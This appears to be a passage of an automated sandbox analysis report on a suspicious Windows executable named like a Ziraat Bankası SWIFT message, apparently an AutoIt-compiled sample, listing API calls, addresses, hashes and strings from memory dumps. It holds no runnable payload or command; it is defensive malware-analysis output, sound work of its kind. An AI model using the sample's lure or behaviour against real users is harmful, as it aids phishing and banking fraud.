                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                        • Opcode ID: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
                                                                                                                                                        • Instruction ID: 78899d73ed1e63c356bf3315f9e24c45ba5191e6924ef594933aa09e94439101
                                                                                                                                                        • Opcode Fuzzy Hash: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
                                                                                                                                                        • Instruction Fuzzy Hash: AEF03A72241158BBE7215B92AC0EEEF7FBCEFC6B11F000018FA4192451EBE15A81D6B5
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 000C9A33
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A44
                                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A51
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A5E
                                                                                                                                                          • Part of subcall function 000C93D1: CloseHandle.KERNEL32(?,?,000C9A6B,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C93DB
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000C9A71
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A78
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                        • Opcode ID: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
                                                                                                                                                        • Instruction ID: 4333b7c17ade0ffbeb3b386b1ffd82b121abd5f9589a97742c96cb15a429712b
                                                                                                                                                        • Opcode Fuzzy Hash: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
                                                                                                                                                        • Instruction Fuzzy Hash: 83F0B832142201ABD3112BE4FC8CEEE3779FF88302B440029F243A18A4CBB49980DBA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
                                                                                                                                                          • Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533
                                                                                                                                                        • __swprintf.LIBCMT ref: 00081EA6
                                                                                                                                                        Strings
                                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00081D49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                        • API String ID: 2125237772-557222456
                                                                                                                                                        • Opcode ID: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
                                                                                                                                                        • Instruction ID: 7ba2eb45320488c05626eed129332bf255b282fd022553d5a0cbd09b42c22a7e
                                                                                                                                                        • Opcode Fuzzy Hash: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
                                                                                                                                                        • Instruction Fuzzy Hash: 46916A71108205AFD724FF24C996CAEB7E8BF95700F04492DF986972A2DB30ED45DB92
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000DB006
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 000DB115
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000DB298
                                                                                                                                                          • Part of subcall function 000C9DC5: VariantInit.OLEAUT32(00000000), ref: 000C9E05
                                                                                                                                                          • Part of subcall function 000C9DC5: VariantCopy.OLEAUT32(?,00000001), ref: 000C9E0E
                                                                                                                                                          • Part of subcall function 000C9DC5: VariantClear.OLEAUT32(?), ref: 000C9E1A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                                        • Opcode ID: 20e595063a9bc5df3fc3aa0a1759fe607748d4c3e811aa1751ebf53bbac8a82c
                                                                                                                                                        • Instruction ID: ba95d0501c4610dbc1ab43c1e3d3bbb1574d3c301d58d2e8d532590a4d1b3254
                                                                                                                                                        • Opcode Fuzzy Hash: 20e595063a9bc5df3fc3aa0a1759fe607748d4c3e811aa1751ebf53bbac8a82c
                                                                                                                                                        • Instruction Fuzzy Hash: 28714835604301DFCB10EF24C4859AEBBE4BF89714F05496EF89A9B362DB31E945CB62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717
                                                                                                                                                        • _memset.LIBCMT ref: 000C5438
                                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 000C5467
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C5513
                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000C553D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                                                        • Opcode ID: 4c28318736609a113819fcab2c5b114dfac1ccae0f6c221d4acc6a1d6a01f2bb
                                                                                                                                                        • Instruction ID: 268ccba4b6d6339f33b2b19b2aa4dd004e943461e0334b9317d11ff340381e25
                                                                                                                                                        • Opcode Fuzzy Hash: 4c28318736609a113819fcab2c5b114dfac1ccae0f6c221d4acc6a1d6a01f2bb
                                                                                                                                                        • Instruction Fuzzy Hash: D1512339504B019BD7949B28CC41FAFB7E8EF95366F04062DF895D31A1EBA0EDC08B52
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000C02B1
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000C02C2
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C0344
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                        • Opcode ID: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
                                                                                                                                                        • Instruction ID: 758dc15a9316f10af351a136666aaa1dd6ee8ffba14ebfa92443e3e7d074758c
                                                                                                                                                        • Opcode Fuzzy Hash: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
                                                                                                                                                        • Instruction Fuzzy Hash: B9415AB1604204EFDB55CF64C884F9EBBB9EF44314F1480ADE9099F256D7B1DA45CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C5075
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 000C5091
                                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 000C50D7
                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00141708,00000000), ref: 000C5120
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                                        • Opcode ID: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
                                                                                                                                                        • Instruction ID: 5cd4556290aa18f8cdd3c49e5292223d47ed748649fd45e759a70556cf65d6a9
                                                                                                                                                        • Opcode Fuzzy Hash: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
                                                                                                                                                        • Instruction Fuzzy Hash: CC418C792047019FD7209F24DC88F6EBBE4AF85325F184A1EF99597292D770A980CB62
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000BB88E
                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000BB8A1
                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 000BB8D1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 3850602802-1403004172
                                                                                                                                                        • Opcode ID: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
                                                                                                                                                        • Instruction ID: 05d3e25ec59f4e7a5134631049db91f0f30ad294dceeeb56c3f9d08c41af9959
                                                                                                                                                        • Opcode Fuzzy Hash: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
                                                                                                                                                        • Instruction Fuzzy Hash: D121E175900108AFEB14ABA4D886DFE77B8EF05350B144129F061A31E2DBB54D069B60
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4427
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000D4457
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 000D449E
                                                                                                                                                          • Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                                                        • Opcode ID: bdc22e181c50967eb4677eefdc3af92225a2d236c95f67fb5db25d1562fe477e
                                                                                                                                                        • Instruction ID: 208c0a1e270488363f0c317eb36b2bbab4cfe142ad7b13848e6f103c469ffc20
                                                                                                                                                        • Opcode Fuzzy Hash: bdc22e181c50967eb4677eefdc3af92225a2d236c95f67fb5db25d1562fe477e
                                                                                                                                                        • Instruction Fuzzy Hash: 39218EB2500308BFE7219F94DC85EBFBAECEB48748F10801BF549A2241EA748D859B71
                                                                                                                                                        APIs
                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 000C9588
                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C95B9
                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 000C95CB
                                                                                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 000C9605
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                                                        • String ID: nul
                                                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                                                        • Opcode ID: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
                                                                                                                                                        • Instruction ID: a352dd599977aab795ad084c31ddb93d20c4e2588d1582b54e923264a13a2977
                                                                                                                                                        • Opcode Fuzzy Hash: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
                                                                                                                                                        • Instruction Fuzzy Hash: 84216071600605ABDB21AF65DC09F9E7BF8AF45720F204A5DF9A1D72D0D770D941CB10
                                                                                                                                                        APIs
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 000C9653
                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C9683
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 000C9694
                                                                                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 000C96CE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                                                        • String ID: nul
                                                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                                                        • Opcode ID: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
                                                                                                                                                        • Instruction ID: 210b730801592e2fa8617bc7f98779771d1ae6c780bfc627254b7e1508384353
                                                                                                                                                        • Opcode Fuzzy Hash: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
                                                                                                                                                        • Instruction Fuzzy Hash: DA2150716002059BDB209F699C49F9EB7E8AF55734F200A1DF8A1E72D0EBB0D981CB50
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 000CDB0A
                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000CDB5E
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CDB77
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0011DC00), ref: 000CDBB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                        • String ID: %lu
                                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                                        • Opcode ID: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
                                                                                                                                                        • Instruction ID: dd12055bc1a89ad6b050324765eabf59177583664265c860d193135bb90ae0f0
                                                                                                                                                        • Opcode Fuzzy Hash: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
                                                                                                                                                        • Instruction Fuzzy Hash: 73218035A00208AFDB10EFA4DD85EEEBBB8EF49704B014069F549E7252DB71EE41DB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
                                                                                                                                                          • Part of subcall function 000BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
                                                                                                                                                          • Part of subcall function 000BC82D: GetCurrentThreadId.KERNEL32 ref: 000BC864
                                                                                                                                                          • Part of subcall function 000BC82D: AttachThreadInput.USER32(00000000), ref: 000BC86B
                                                                                                                                                        • GetFocus.USER32 ref: 000BCA05
                                                                                                                                                          • Part of subcall function 000BC876: GetParent.USER32(?), ref: 000BC884
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 000BCA4E
                                                                                                                                                        • EnumChildWindows.USER32(?,000BCAC4), ref: 000BCA76
                                                                                                                                                        • __swprintf.LIBCMT ref: 000BCA90
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                                                        • String ID: %s%d
                                                                                                                                                        • API String ID: 3187004680-1110647743
                                                                                                                                                        • Opcode ID: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
                                                                                                                                                        • Instruction ID: 961a08fce9707a7a912ea4be4946a7fe67756dcc9d10a34d39d2e4fc89b28764
                                                                                                                                                        • Opcode Fuzzy Hash: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
                                                                                                                                                        • Instruction Fuzzy Hash: 3211AC756002096BEB11BFA09C86FEA376DAB44704F048066FA08AA083CBB09945CB71
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 000EE1D5
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000EE20D
                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 000EE248
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 000EE269
                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 000EE281
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
